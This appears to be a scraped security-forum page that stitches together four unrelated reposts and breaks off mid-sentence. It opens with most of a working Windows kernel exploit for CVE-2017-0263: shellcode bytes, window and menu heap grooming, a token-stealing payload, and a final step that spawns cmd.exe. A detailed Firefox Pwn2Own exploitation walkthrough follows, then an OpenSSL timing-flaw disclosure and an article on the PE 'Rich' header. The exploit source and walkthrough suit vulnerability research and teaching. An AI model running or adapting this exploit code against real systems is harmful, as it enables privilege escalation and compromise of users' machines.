0x8b, 0xf1, // mov esi,ecx 0x8b, 0x42, 0x14, // mov eax,dword ptr [edx+14h] 0x03, 0xf0, // add esi,eax 0x03, 0xf8, // add edi,eax 0xad, // lods dword ptr [esi] 0xab, // stos dword ptr es:[edi] 0x83, 0xe0, 0xf8, // and eax,0FFFFFFF8h 0x83, 0x40, 0xe8, 0x02, // add dword ptr [eax-18h],2 0x61, // popad 0xb8, 0x9f, 0x9f, 0x00, 0x00, // mov eax,9F9Fh 0xeb, 0x05, // jmp Loader+0x112d // Loader+0x1128: // Failed in processing. 0xb8, 0x01, 0x00, 0x00, 0x00, // mov eax,1 // Loader+0x112d: 0xc9, // leave 0xc2, 0x10, 0x00, // ret 10h }; static VOID xxGetHMValidateHandle(VOID) { HMODULE hModule = LoadLibraryA("USER32.DLL"); PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu"); PBYTE Address = NULL; for (INT i = 0; i < 0x30; i++) { if (*(WORD *)(i + pfnIsMenu) != 0x02B2) { continue; } i += 2; if (*(BYTE *)(i + pfnIsMenu) != 0xE8) { continue; } Address = *(DWORD *)(i + pfnIsMenu + 1) + pfnIsMenu; Address = Address + i + 5; pfnHMValidateHandle = (PVOID(__fastcall *)(HANDLE, BYTE))Address; break; } } #define TYPE_WINDOW 1 static PVOID xxHMValidateHandleEx(HWND hwnd) { return pfnHMValidateHandle((HANDLE)hwnd, TYPE_WINDOW); } static PVOID xxHMValidateHandle(HWND hwnd) { PVOID RetAddr = NULL; if (!pfnHMValidateHandle) { xxGetHMValidateHandle(); } if (pfnHMValidateHandle) { RetAddr = xxHMValidateHandleEx(hwnd); } return RetAddr; } static ULONG_PTR xxSyscall(UINT num, ULONG_PTR param1, ULONG_PTR param2) { __asm { mov eax, num }; __asm { int 2eh }; } static LRESULT WINAPI xxShadowWindowProc( _In_ HWND hwnd, _In_ UINT msg, _In_ WPARAM wParam, _In_ LPARAM lParam ) { if (msg != WM_NCDESTROY || bDoneExploit) { return DefWindowProcW(hwnd, msg, wParam, lParam); } std::cout << "::" << __FUNCTION__ << std::endl; POCDEBUG_BREAK(); DWORD dwPopupFake[0xD] = { 0 }; dwPopupFake[0x0] = (DWORD)0x00098208; //->flags dwPopupFake[0x1] = (DWORD)pvHeadFake; //->spwndNotify dwPopupFake[0x2] = (DWORD)pvHeadFake; //->spwndPopupMenu dwPopupFake[0x3] = (DWORD)pvHeadFake; //->spwndNextPopup dwPopupFake[0x4] = (DWORD)pvAddrFlags - 4; //->spwndPrevPopup dwPopupFake[0x5] = (DWORD)pvHeadFake; //->spmenu dwPopupFake[0x6] = (DWORD)pvHeadFake; //->spmenuAlternate dwPopupFake[0x7] = (DWORD)pvHeadFake; //->spwndActivePopup dwPopupFake[0x8] = (DWORD)0xFFFFFFFF; //->ppopupmenuRoot dwPopupFake[0x9] = (DWORD)pvHeadFake; //->ppmDelayedFree dwPopupFake[0xA] = (DWORD)0xFFFFFFFF; //->posSelectedItem dwPopupFake[0xB] = (DWORD)pvHeadFake; //->posDropped dwPopupFake[0xC] = (DWORD)0; for (UINT i = 0; i < iWindowCount; ++i) { SetClassLongW(hWindowList[i], GCL_MENUNAME, (LONG)dwPopupFake); } xxSyscall(num_NtUserMNDragLeave, 0, 0); LRESULT Triggered = SendMessageW(hWindowHunt, 0x9F9F, popupMenuRoot, 0); bDoneExploit = Triggered == 0x9F9F; return DefWindowProcW(hwnd, msg, wParam, lParam); } #define MENUCLASS_NAME L"#32768" static LRESULT CALLBACK xxWindowHookProc(INT code, WPARAM wParam, LPARAM lParam) { tagCWPSTRUCT *cwp = (tagCWPSTRUCT *)lParam; static HWND hwndMenuHit = 0; static UINT iShadowCount = 0; if (bDoneExploit || iMenuCreated != num_PopupMenuCount - 2 || cwp->message != WM_NCCREATE) { return CallNextHookEx(0, code, wParam, lParam); } std::cout << "::" << __FUNCTION__ << std::endl; WCHAR szTemp[0x20] = { 0 }; GetClassNameW(cwp->hwnd, szTemp, 0x14); if (!wcscmp(szTemp, L"SysShadow") && hwndMenuHit != NULL) { std::cout << "::iShadowCount=" << iShadowCount << std::endl; POCDEBUG_BREAK(); if (++iShadowCount == num_WndShadowCount) { SetWindowLongW(cwp->hwnd, GWL_WNDPROC, (LONG)xxShadowWindowProc); } else { SetWindowPos(hwndMenuHit, NULL, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE | SWP_NOZORDER | SWP_HIDEWINDOW); SetWindowPos(hwndMenuHit, NULL, 0, 0, 0, 0, SWP_NOSIZE | SWP_NOMOVE | SWP_NOZORDER | SWP_SHOWWINDOW); } } else if (!wcscmp(szTemp, MENUCLASS_NAME)) { hwndMenuHit = cwp->hwnd; std::cout << "::hwndMenuHit=" << hwndMenuHit << std::endl; } return CallNextHookEx(0, code, wParam, lParam); } #define MN_ENDMENU 0x1F3 static VOID CALLBACK xxWindowEventProc( HWINEVENTHOOK hWinEventHook, DWORD event, HWND hwnd, LONG idObject, LONG idChild, DWORD idEventThread, DWORD dwmsEventTime ) { UNREFERENCED_PARAMETER(hWinEventHook); UNREFERENCED_PARAMETER(event); UNREFERENCED_PARAMETER(idObject); UNREFERENCED_PARAMETER(idChild); UNREFERENCED_PARAMETER(idEventThread); UNREFERENCED_PARAMETER(dwmsEventTime); std::cout << "::" << __FUNCTION__ << std::endl; if (iMenuCreated == 0) { popupMenuRoot = *(DWORD *)((PBYTE)xxHMValidateHandle(hwnd) + 0xb0); } if (++iMenuCreated >= num_PopupMenuCount) { std::cout << ">>SendMessage(MN_ENDMENU)" << std::endl; POCDEBUG_BREAK(); SendMessageW(hwnd, MN_ENDMENU, 0, 0); } else { std::cout << ">>SendMessage(WM_LBUTTONDOWN)" << std::endl; POCDEBUG_BREAK(); SendMessageW(hwnd, WM_LBUTTONDOWN, 1, 0x00020002); } } static BOOL xxRegisterWindowClassW(LPCWSTR lpszClassName, INT cbWndExtra) { WNDCLASSEXW wndClass = { 0 }; wndClass = { 0 }; wndClass.cbSize = sizeof(WNDCLASSEXW); wndClass.lpfnWndProc = DefWindowProcW; wndClass.cbWndExtra = cbWndExtra; wndClass.hInstance = GetModuleHandleA(NULL); wndClass.lpszMenuName = NULL; wndClass.lpszClassName = lpszClassName; return RegisterClassExW(&wndClass); } static HWND xxCreateWindowExW(LPCWSTR lpszClassName, DWORD dwExStyle, DWORD dwStyle) { return CreateWindowExW(dwExStyle, lpszClassName, NULL, dwStyle, 0, 0, 1, 1, NULL, NULL, GetModuleHandleA(NULL), NULL); } static VOID xxCreateCmdLineProcess(VOID) { STARTUPINFO si = { sizeof(si) }; PROCESS_INFORMATION pi = { 0 }; si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_SHOW; WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" }; BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi); if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess); } static DWORD WINAPI xxTrackExploitEx(LPVOID lpThreadParameter) { UNREFERENCED_PARAMETER(lpThreadParameter); std::cout << "::" << __FUNCTION__ << std::endl; POCDEBUG_BREAK(); for (INT i = 0; i < num_PopupMenuCount; i++) { MENUINFO mi = { 0 }; hpopupMenu[i] = CreatePopupMenu(); mi.cbSize = sizeof(mi); mi.fMask = MIM_STYLE; mi.dwStyle = MNS_AUTODISMISS | MNS_MODELESS | MNS_DRAGDROP; SetMenuInfo(hpopupMenu[i], &mi); } for (INT i = 0; i < num_PopupMenuCount; i++) { LPCSTR szMenuItem = "item"; AppendMenuA(hpopupMenu[i], MF_BYPOSITION | MF_POPUP, (i >= num_PopupMenuCount - 1) ? 0 : (UINT_PTR)hpopupMenu[i + 1], szMenuItem); } for (INT i = 0; i < 0x100; i++) { WNDCLASSEXW Class = { 0 }; WCHAR szTemp[20] = { 0 }; HWND hwnd = NULL; wsprintfW(szTemp, L"%x-%d", rand(), i); Class.cbSize = sizeof(WNDCLASSEXA); Class.lpfnWndProc = DefWindowProcW; Class.cbWndExtra = 0; Class.hInstance = GetModuleHandleA(NULL); Class.lpszMenuName = NULL; Class.lpszClassName = szTemp; if (!RegisterClassExW(&Class)) { continue; } hwnd = CreateWindowExW(0, szTemp, NULL, WS_OVERLAPPED, 0, 0, 0, 0, NULL, NULL, GetModuleHandleA(NULL), NULL); if (hwnd == NULL) { continue; } hWindowList[iWindowCount++] = hwnd; } for (INT i = 0; i < iWindowCount; i++) { pvShellCode->tagCLS[i] = *(PVOID *)((PBYTE)xxHMValidateHandle(hWindowList[i]) + num_offset_WND_pcls); } DWORD fOldProtect = 0; VirtualProtect(pvShellCode, 0x1000, PAGE_EXECUTE_READ, &fOldProtect); xxRegisterWindowClassW(L"WNDCLASSMAIN", 0x000); hWindowMain = xxCreateWindowExW(L"WNDCLASSMAIN", WS_EX_LAYERED | WS_EX_TOOLWINDOW | WS_EX_TOPMOST, WS_VISIBLE); xxRegisterWindowClassW(L"WNDCLASSHUNT", 0x200); hWindowHunt = xxCreateWindowExW(L"WNDCLASSHUNT", WS_EX_LEFT, WS_OVERLAPPED); PTHRDESKHEAD head = (PTHRDESKHEAD)xxHMValidateHandle(hWindowHunt); PBYTE pbExtra = head->deskhead.pSelf + 0xb0 + 4; pvHeadFake = pbExtra + 0x44; for (UINT x = 0; x < 0x7F; x++) { SetWindowLongW(hWindowHunt, sizeof(DWORD) * (x + 1), (LONG)pbExtra); } PVOID pti = head->thread.pti; SetWindowLongW(hWindowHunt, 0x28, 0); SetWindowLongW(hWindowHunt, 0x50, (LONG)pti); // pti SetWindowLongW(hWindowHunt, 0x6C, 0); SetWindowLongW(hWindowHunt, 0x1F8, 0xC033C033); SetWindowLongW(hWindowHunt, 0x1FC, 0xFFFFFFFF); pvAddrFlags = *(PBYTE *)((PBYTE)xxHMValidateHandle(hWindowHunt) + 0x10) + 0x16; SetWindowLongW(hWindowHunt, GWL_WNDPROC, (LONG)pvShellCode->pfnWindProc); SetWindowsHookExW(WH_CALLWNDPROC, xxWindowHookProc, GetModuleHandleA(NULL), GetCurrentThreadId()); SetWinEventHook(EVENT_SYSTEM_MENUPOPUPSTART, EVENT_SYSTEM_MENUPOPUPSTART, GetModuleHandleA(NULL), xxWindowEventProc, GetCurrentProcessId(), GetCurrentThreadId(), 0); TrackPopupMenuEx(hpopupMenu[0], 0, 0, 0, hWindowMain, NULL); MSG msg = { 0 }; while (GetMessageW(&msg, NULL, 0, 0)) { TranslateMessage(&msg); DispatchMessageW(&msg); } return 0; } INT POC_CVE20170263(VOID) { std::cout << "-------------------" << std::endl; std::cout << "POC - CVE-2017-0263" << std::endl; std::cout << "-------------------" << std::endl; pvShellCode = (PSHELLCODE)VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (pvShellCode == NULL) { return 0; } ZeroMemory(pvShellCode, 0x1000); pvShellCode->pid = GetCurrentProcessId(); pvShellCode->off_CLS_lpszMenuName = 0x050; pvShellCode->off_THREADINFO_ppi = 0x0b8; pvShellCode->off_EPROCESS_ActiveLink = 0x0b8; pvShellCode->off_EPROCESS_Token = 0x0f8; CopyMemory(pvShellCode->pfnWindProc, xxPayloadWindProc, sizeof(xxPayloadWindProc)); std::cout << "CREATE WORKER THREAD..." << std::endl; POCDEBUG_BREAK(); HANDLE hThread = CreateThread(NULL, 0, xxTrackExploitEx, NULL, 0, NULL); if (hThread == NULL) { return FALSE; } while (!bDoneExploit) { Sleep(500); } xxCreateCmdLineProcess(); DestroyWindow(hWindowMain); TerminateThread(hThread, 0); std::cout << "-------------------" << std::endl; getchar(); return bDoneExploit; } INT main(INT argc, CHAR *argv[]) { POC_CVE20170263(); return 0; } Sursa: https://www.exploit-db.com/exploits/44478/?rss&utm_source=dlvr.it&utm_medium=twitter
-
How to kill a (Fire)fox – en 2018 年 4 月 16 日 admin001 写评论 Pwn2own 2018 Firefox case study Author: Hanming Zhang from 360 vulcan team 1. Debug Environment OS Windows 10 Firefox_Setup_59.0.exe SHA1: 294460F0287BCF5601193DCA0A90DB8FE740487C Xul.dll SHA1: E93D1E5AF21EB90DC8804F0503483F39D5B184A9 2. Patch Infomation The issue in Mozilla’s Bugzilla is Bug 1446062. The vulnerability used in pwn2own 2018 is assigned with CVE-2018-5146. From the Mozilla security advisory, we can see this vulnerability came from libvorbis – a third-party media library. In next section, I will introduce some base information of this library. 3. Ogg and Vorbis 3.1. Ogg Ogg is a free, open container format maintained by the Xiph.Org Foundation. One “Ogg file” consist of some “Ogg Page” and one “Ogg Page” contains one Ogg Header and one Segment Table. The structure of Ogg Page can be illustrate as follow picture. Pic.1 Ogg Page Structure 3.2. Vorbis Vorbis is a free and open-source software project headed by the Xiph.Org Foundation. In a Ogg file, data relative to Vorbis will be encapsulated into Segment Table inside of Ogg Page. One MIT document show the process of encapsulation. 3.2.1. Vorbis Header In Vorbis, there are three kinds of Vorbis Header. For one Vorbis bitstream, all three kinds of Vorbis header shound been set. And those Header are: Vorbis Identification Header Basically define Ogg bitstream is in Vorbis format. And it contains some information such as Vorbis version, basic audio information relative to this bitstream, include number of channel, bitrate. Vorbis Comment Header Basically contains some user define comment, such as Vendor infomation。 Vorbis Setup Header Basically contains information use to setup codec, such as complete VQ and Huffman codebooks used in decode. 3.2.2. Vorbis Identification Header Vorbis Identification Header structure can be illustrated as follow: Pic.2 Vorbis Identification Header Structure 3.2.3. Vorbis Setup Header Vorbis Setup Heade Structure is more complicate than other headers, it contain some substructure, such as codebooks. After “vorbis” there was the number of CodeBooks, and following with CodeBook Objcet corresponding to the number. And next was TimeBackends, FloorBackends, ResiduesBackends, MapBackends, Modes. Vorbis Setup Header Structure can be roughly illustrated as follow: Pic.3 Vorbis Setup Header Structure 3.2.3.1. Vorbis CodeBook As in Vorbis spec, a CodeBook structure can be represent as follow: byte 0: [ 0 1 0 0 0 0 1 0 ] (0x42) byte 1: [ 0 1 0 0 0 0 1 1 ] (0x43) byte 2: [ 0 1 0 1 0 1 1 0 ] (0x56) byte 3: [ X X X X X X X X ] byte 4: [ X X X X X X X X ] [codebook_dimensions] (16 bit unsigned) byte 5: [ X X X X X X X X ] byte 6: [ X X X X X X X X ] byte 7: [ X X X X X X X X ] [codebook_entries] (24 bit unsigned) byte 8: [ X ] [ordered] (1 bit) byte 8: [ X 1 ] [sparse] flag (1 bit) After the header, there was a length_table array which length equal to codebook_entries. Element of this array can be 5 bit or 6 bit long, base on the flag. Following as VQ-relative structure: [codebook_lookup_type] 4 bits [codebook_minimum_value] 32 bits [codebook_delta_value] 32 bits [codebook_value_bits] 4 bits and plus one [codebook_sequence_p] 1 bits Finally was a VQ-table array with length equal to codebook_dimensions * codebook_entrue,element length Corresponding to codebood_value_bits. Codebook_minimum_value and codebook_delta_value will be represent in float type, but for support different platform, Vorbis spec define a internal represent format of “float”, then using system math function to bake it into system float type. In Windows, it will be turn into double first than float. All of above build a CodeBook structure. 3.2.3.2. Vorbis Time In nowadays Vorbis spec, this data structure is nothing but a placeholder, all of it data should be zero. 3.2.3.3. Vorbis Floor In recent Vorbis spec, there were two different FloorBackend structure, but it will do nothing relative to vulnerability. So we just skip this data structure. 3.2.3.4. Vorbis Residue In recent Vorbis spec, there were three kinds of ResidueBackend, different structure will call different decode function in decode process. It’s structure can be presented as follow: [residue_begin] 24 bits [residue_end] 24 bits [residue_partition_size] 24 bits and plus one [residue_classifications] = 6 bits and plus one [residue_classbook] 8 bits The residue_classbook define which CodeBook will be used when decode this ResidueBackend. MapBackend and Mode dose not have influence to exploit so we skip them too. 4. Patch analysis 4.1. Patched Function From blog of ZDI, we can see vulnerability inside following function: /* decode vector / dim granularity gaurding is done in the upper layer */ long vorbis_book_decodev_add(codebook *book, float *a, oggpack_buffer *b, int n) { if (book->used_entries > 0) { int i, j, entry; float *t; if (book->dim > 8) { for (i = 0; i < n;) { entry = decode_packed_entry_number(book, b); if (entry == -1) return (-1); t = book->valuelist + entry * book->dim; for (j = 0; j < book->dim;) { a[i++] += t[j++]; } } else { // blablabla } } return (0); } Inside first if branch, there was a nested loop. Inside loop use a variable “book->dim” without check to stop loop, but it also change a variable “i” come from outer loop. So if ”book->dim > n”, “a[i++] += t[j++]” will lead to a out-of-bound-write security issue. In this function, “a” was one of the arguments, and t was calculate from “book->valuelist”. 4.2. Buffer – a After read some source , I found “a” was initialization in below code: /* alloc pcm passback storage */ vb->pcmend=ci->blocksizes[vb->W]; vb->pcm=_vorbis_block_alloc(vb,sizeof(*vb->pcm)*vi->channels); for(i=0;ichannels;i++) vb->pcm=_vorbis_block_alloc(vb,vb->pcmend*sizeof(*vb->pcm)); The “vb->pcm” will be pass into vulnerable function as “a”, and it’s memory chunk was alloc by _vorbis_block_alloc with size equal to vb->pcmend*sizeof(*vb->pcm). And vb->pcmend come from ci->blocksizes[vb->W], ci->blocksizes was defined in Vorbis Identification Header. So we can control the size of memory chunk alloc for “a”. Digging deep into _vorbis_block_alloc, we can found this call chain _vorbis_block_alloc -> _ogg_malloc -> CountingMalloc::Malloc -> arena_t::Malloc, so the memory chunk of “a” was lie on mozJemalloc heap. 4.3. Buffer – t After read some source code , I found book->valuelist get its value from here: c->valuelist=_book_unquantize(s,n,sortindex); And the logic of _book_unquantize can be show as follow: float *_book_unquantize(const static_codebook *b, int n, int *sparsemap) { long j, k, count = 0; if (b->maptype == 1 || b->maptype == 2) { int quantvals; float mindel = _float32_unpack(b->q_min); float delta = _float32_unpack(b->q_delta); float *r = _ogg_calloc(n * b->dim, sizeof(*r)); switch (b->maptype) { case 1: quantvals=_book_maptype1_quantvals(b); // do some math work break; case 2: float val=b->quantlist[j*b->dim+k]; // do some math work break; } return (r); } return (NULL); } So book->valuelist was the data decode from corresponding CodeBook’s VQ data. It was lie on mozJemalloc heap too. 4.4. Cola Time So now we can see, when the vulnerability was triggered: a lie on mozJemalloc heap; size controllable. t lie on mozJemalloc heap too; content controllable. book->dim content controllable. Combine all thing above, we can do a write operation in mozJemalloc heap with a controllable offset and content. But what about size controllable? Can this work for our exploit? Let’s see how mozJemalloc work. 5. mozJemalloc mozJemalloc is a heap manager Mozilla develop base on Jemalloc. Following was some global variables can show you some information about mozJemalloc. gArenas mDefaultArena mArenas mPrivateArenas gChunkBySize gChunkByAddress gChunkRTress In mozJemalloc, memory will be divide into Chunks, and those chunk will be attach to different Arena. Arena will manage chunk. User alloc memory chunk must be inside one of the chunks. In mozJemalloc, we call user alloc memory chunk as region. And Chunk will be divide into run with different size.Each run will bookkeeping region status inside it through a bitmap structure. 5.1. Arena In mozJemalloc, each Arena will be assigned with a id. When allocator need to alloc a memory chunk, it can use id to get corresponding Arena. There was a structure call mBin inside Arena. It was a array, each element of it wat a arena_bin_t object, and this object manage all same size memory chunk in this Arena. Memory chunk size from 0x10 to 0x800 will be managed by mBin. Run used by mBin can not be guarantee to be contiguous, so mBin using a red-black-tree to manage Run. 5.2. Run The first one region inside a Run will be use to save Run manage information, and rest of the region can be use when alloc. All region in same Run have same size. When alloc region from a Run, it will return first No-in-use region close to Run header. 5.3. Arena Partition This now code branch in mozilla-central, all JavaScript memory alloc or free will pass moz_arena_ prefix function. And this function will only use Arena which id was 1. In mozJemalloc, Arena can be a PrivateArena or not a PrivateArena. Arena with id 1 will be a PrivateArena. So it means that ogg buffer will not be in the same Arena with JavaScript Object. In this situation, we can say that JavaScript Arena was isolated with other Arenas. But in vulnerable Windows Firefox 59.0 does not have a PrivateArena, so that we can using JavaScript Object to perform a Heap feng shui to run a exploit. First I was debug in a Linux opt+debug build Firefox, as Arena partition, it was hard to found a way to write a exploit, so far I can only get a info leak situation in Linux. 6. Exploit In the section, I will show how to build a exploit base on this vulnerability. 6.1. Build Ogg file First of all, we need to build a ogg file which can trigger this vulnerability, some of PoC ogg file data as follow: Pic.4 PoC Ogg file partial data We can see codebook->dim equal to 0x48。 6.2. Heap Spary First we alloc a lot JavaScript avrray, it will exhaust all useable memory region in mBin, and therefore mozJemalloc have to map new memory and divide it into Run for mBin. Then we interleaved free those array, therefore there will be many hole inside mBin, but as we can never know the original layout of mBin, and there can be other object or thread using mBin when we free array, the hole may not be interleaved. If the hole is not interleaved, our ogg buffer may be malloc in a contiguous hole, in this situation, we can not control too much off data. So to avoid above situation, after interleaved free, we should do some compensate to mBin so that we can malloc ogg buffer in a hole before a array. 6.3. Modify Array Length After Heap Spary,we can use _ogg_malloc to malloc region in mozJemalloc heap. So we can force a memory layout as follow: |———————contiguous memory —————————| [ hole ][ Array ][ ogg_malloc_buffer ][ Array ][ hole ] And we trigger a out-of-bound write operation, we can modify one of the array’s length. So that we have a array object in mozJemalloc which can read out-of-bound. Then we alloc many ArrayBuffer Object in mozJemalloc. Memory layout turn into following situation: |——————————-contiguous memory —————————| [ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents ] In this situation, we can use Array_length_modified to read/write ArrayBuffer_contents. Finally memory will like this: |——————————-contiguous memory —————————| [ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents_modified ] 6.4. Cola time again Now we control those object and we can do: Array_length_modified Out-of-bound write Out-of-bound read ArrayBuffer_contents_modified In-bound write In-bound read If we try to leak memory data from Array_length_modified, due to SpiderMonkey use tagged value, we will read “NaN” from memory. But if we use Array_length_modified to write something in ArrayBuffer_contents_modified, and read it from ArrayBuffer_contents_modified. We can leak pointer of Javascript Object from memory. 6.5. Fake JSObject We can fake a JSObject on memory by leak some pointer and write it into JavasScript Object. And we can write to a address through this Fake Object. (turn off baselineJIT will help you to see what is going on and following contents will base on baselineJIT disable) Pic.5 Fake JavaScript Object If we alloc two arraybuffer with same size, they will in contiguous memory inside JS::Nursery heap. Memory layout will be like follow |———————contiguous memory —————————| [ ArrayBuffer_1 ] [ ArrayBuffer_2 ] And we can change first arraybuffer’s metadata to make SpiderMonkey think it cover second arraybuffer by use fake object trick. |———————contiguous memory —————————| [ ArrayBuffer_1 ] [ ArrayBuffer_2 ] We can read/write to arbitrarily memory now. After this, all you need was a ROP chain to get Firefox to your shellcode. 6.6. Pop Calc? Finally we achieve our shellcode, process context as follow: Pic.6 achieve shellcode Corresponding memory chunk information as follow: Pic.7 memory address information But Firefox release have enable Sandbox as default, so if you try to pop calc through CreateProcess, Sandbox will block it. 7. Relative code and works Firefox Source Code OR’LYEH? The Shadow over Firefox by argp Exploiting the jemalloc Memory Allocator: Owning Firefox’s Heap by argp,haku QUICKLY PWNED, QUICKLY PATCHED: DETAILS OF THE MOZILLA PWN2OWN EXPLOIT by thezdi Sursa: http://blogs.360.cn/blog/how-to-kill-a-firefox-en/
-
From: Billy Brumley <bbrumley () gmail com> Date: Mon, 16 Apr 2018 19:46:03 +0300 Hey Folks, We discovered 3 vulnerabilities in OpenSSL that allow cache-timing enabled attackers to recover RSA private keys during key generation. 1. BN_gcd gets called to check that _e_ and _p-1_ are relatively prime. This function is not constant time, and leaks critical GCD state leading to information on _p_. 2. During primality testing, BN_mod_inverse gets called without the BN_FLG_CONSTTIME set during Montgomery arithmetic setup. The resulting code path is not constant time, and leaks critical GCD state leading to information on _p_. 3. During primality testing, BN_mod_exp_mont gets called without the BN_FLG_CONSTTIME set during modular exponentiation, with an exponent _x_ satisfying _p - 1 = 2**k * x_ hence recovering _x_ gives you most of _p_. The resulting code path is not constant time, and leaks critical exponentiation state leading to information on _x_ and hence _p_. OpenSSL issued CVE-2018-0737 to track this issue. # Affected software LibreSSL fixed these issues (nice!) way back when this was reported in Jan 2017. Looks like commits 5a1bc054398ec4d2c33e5bdc3a16eece01c8901d 952c1252f58f5f57227f5efaeec0169759c77d72 We verified that with a debugger. OTOH, OpenSSL wanted concrete evidence of exploitability. That's what we did over the past year and a half or so.We ran with bug (1) and recover RSA keys with cache-timings, achieving roughly 30% success rate in over 10K trials on a cluster. Affects 1.1.0, 1.0.2, and presumably all the EOL lines. ## Fixes Recently, it looks like (1) was independently discovered, and some code changes happened. Nothing for (2) and (3). ### 1.0.2-stable Part of the fix (1) is in commits 0d6710289307d277ebc3354105c965b6e8ba8eb0 64eb614ccc7ccf30cc412b736f509f1d82bbf897 0b199a883e9170cdfe8e61c150bbaf8d8951f3e7 In combination with our contributed patch in 349a41da1ad88ad87825414752a8ff5fdd6a6c3f we verified with a debugger they cumulatively solve (1) (2) and (3). ### 1.1.0-stable Part of the fix (1) is in commits 7150a4720af7913cae16f2e4eaf768b578c0b298 011f82e66f4bf131c733fd41a8390039859aafb2 9db724cfede4ba7a3668bff533973ee70145ec07 In combination with our contributed patch in 6939eab03a6e23d2bd2c3f5e34fe1d48e542e787 we verified with a debugger they cumulatively solve (1) (2) and (3). Look for our preprint on http://eprint.iacr.org/ soon -- working title is "One Shot, One Trace, One Key: Cache-Timing Attacks on RSA Key Generation". We'll update the list with the full URL once it's posted. # Timeline Jan 2017: Notified OpenSSL, LibreSSL, BoringSSL 4 Apr 2018: Notified OpenSSL again, with PoC and 16 Apr, 15:00 UTC embargo 11 Apr 2018: Notified distros list 16 Apr 2018: Notified oss-security list Thanks for reading! Alejandro Cabrera Aldaya Cesar Pereida Garcia Luis Manuel Alvarez Tapia Billy Brumley Sursa: http://seclists.org/oss-sec/2018/q2/50
-
he Undocumented Microsoft "Rich" Header Date: Mar 12, 2017 Last-Modified: Feb 28, 2018 SUMMARY: There is a bizarre undocumented structure that exists only in Microsoft-produced executables. You may have never noticed the structure even if you've scanned past it a thousand times in a hex dump. This linker-generated structure is present in millions of EXE, DLL and driver modules across the globe built after the late 90's. This was when proprietary features were introduced into both Microsoft compilers and the Microsoft Linker to facilitate its generation. If you view the first 256 bytes of almost any module built with Microsoft development tools (such as Visual C++) or those that ship with the Windows operating system, such as KERNEL32.DLL from Windows XP SP3 (shown below), you can easily spot the signature in a hex viewer. Just look for the word "Rich" after the sequence "This program cannot be run in DOS mode": 00000000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 MZ.............. <--DOS header 00000010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 ................ 00000040 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 ........!..L.!Th <--DOS STUB 00000050 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f is program canno 00000060 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 t be run in DOS 00000070 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 mode....$....... 00000080 17 86 20 aa 53 e7 4e f9 53 e7 4e f9 53 e7 4e f9 .. .S.N.S.N.S.N. <--Start of "Rich" Header 00000090 53 e7 4f f9 d9 e6 4e f9 90 e8 13 f9 50 e7 4e f9 S.O...N.....P.N. 000000A0 90 e8 12 f9 52 e7 4e f9 90 e8 10 f9 52 e7 4e f9 ....R.N.....R.N. 000000B0 90 e8 41 f9 56 e7 4e f9 90 e8 11 f9 8e e7 4e f9 ..A.V.N.......N. 000000C0 90 e8 2e f9 57 e7 4e f9 90 e8 14 f9 52 e7 4e f9 ....W.N.....R.N. 000000D0 52 69 63 68 53 e7 4e f9 00 00 00 00 00 00 00 00 RichS.N......... <--End of "Rich" header 000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000F0 50 45 00 00 4c 01 04 00 2c a1 02 48 00 00 00 00 PE..L...,..H.... <--PE header When present, the "Rich" signature (DWORD value 0x68636952) can be found sandwiched (maybe "camouflaged" is a better word) between the DOS and PE headers of a Windows PE (portable executable) image. I say camouflaged, because it appears, perhaps by Microsoft's original design, to be part of the 16-bit DOS stub code, which it is not. Since many programmer probably weren't versed with 16-bit assembly even when Microsoft introduced this structure, you could argue the decision to embed something at this particular location in every executable was certainly a strategic one to help it hide in plain sight. In Microsoft-linked executables, not only does the DOS mode string begin at predictable offset 0x4E, but the "Rich" structure always seems to appear at offset 0x80; this makes sense as the DOS header has probably been hardcoded for quite some time. Oddly enough, the "Rich" signature actually marks the end of the structure's data, whose size varies. Therefore the position of the signature as well as the total size of the structure changes from module to module. The 32-bit value that follows the signature not only marks the end of the structure itself, it happens to be the key that is used to decrypt the structure's data. Following this structure is the PE header, with a handful of zero-padded bytes in between. Since this is an undocumented "feature" of the Microsoft linker, it is not surprising that there is no known option to disable it, short of patching (discussed below). At the time of discovery, all executables built using Microsoft language tools contained this structure (e.g. Visual C++, Visual Basic 6.x and below, MASM, etc.) causing many developers to fear the worst. Two "seemingly" identical installations of Visual Studio building the same source code appeared to produce executables with differing "Rich" headers. This combined with the fact that the structure was encrypted led many to the assumption that Microsoft was embedding personally identifiable information, ultimately allowing any given executable to be traced back to the machine it was built with. An old 2007 post on the Sysinternals forum refers to this structure the "Devil's Mark". Also of interest is a 2008 report on Donationcoder that Microsoft utilized the information from this structure as "evidence against several high-profile virus writers". A post from Garage4Hackers said "Microsoft uses compiler ids to prove that a virus is made on a particular machine with a particular compiler. Proving that the person owning the computer is the virus writer". Note that while this structure is present in some .NET executables, it is not present in those that do not make use of the Microsoft linker. For example, an application composed purely of .NET Intermediate Language such as C# does not contain this structure. For any given executable module, you can check for the existence of the "Rich" header (in addition to viewing the decoded fields) using the pelook tool tool with the -rh option. Before jumping to any conclusions, lets see what Microsoft is hiding here. AN ARRAY OF NUMERIC VALUES: First off, the "Rich" header really isn't a header at all. It is a self-contained chunk of data that doesn't reference anything else in the executable and nothing else in the executable references it. The structure was unofficially referred to as a header because it happens to reside in PE header area. The structure happens to be little more than an array of 32-bit (DWORD) values between two markers. If one so chooses, the structure can even be safely zeroed-out from the executable without affecting any functionality. Just ensure you update the PE OptionalHeader's 